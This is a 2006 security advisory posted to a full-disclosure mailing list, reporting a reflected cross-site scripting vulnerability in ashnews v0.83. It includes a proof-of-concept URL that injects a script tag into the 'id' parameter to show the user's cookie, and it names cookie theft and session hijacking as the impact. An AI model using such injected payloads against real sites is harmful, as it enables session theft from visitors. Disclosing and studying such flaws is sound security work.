[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <558f59870601300821he78297q89baf66fae9ff02a@mail.gmail.com>
Date: Mon Jan 30 16:47:48 2006
From: zeus.olimpusklan at gmail.com (zeus olimpusklan)
Subject: ashnews Cross-Site Scripting Vulnerability
###########################################################################
# Advisory #5 Title: ashnews Cross-Site Scripting Vulnerability
#
#
# Author: 0o_zeus_o0 and fraude
# Contact: zeus@...sdelared.com
# Website: Elitemexico.org
# Date: 30/01/2006
# Risk: High
# Vendor Url: http://dev.ashwebstudio.com/
# Affected Software: ashnews
# Non Affected:
#
# We Are: olimpus klan team
#
#TECHNICAL INFO
#================================================================
#
#vulnerability that allows to the robbery of cookie and kidnapping of user
#
#
#Example:
#
#http://www.url.com/[path]/ashnews.php?page=showcomments&id=<script><script>alert(
document.cookie)</script>
#
#http://www.url.com/[path]/ashnews.php?page=showcomments&id=[xss]
#
#
#Solution:
#
#
#
#
#VULNERABLE VERSIONS
#================================================================
#ashnews v0.83 Other versions may also be affected.
#
#
#================================================================
#Contact information
#0o_zeus_o0
#zeus@...sdelared.com
#www.olimpusklan.org
#================================================================
#greetz: lady fire,Mi beba, fraude and security-mx
##############################################################################
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060130/3e73a3b3/attachment.html
Powered by blists - more mailing lists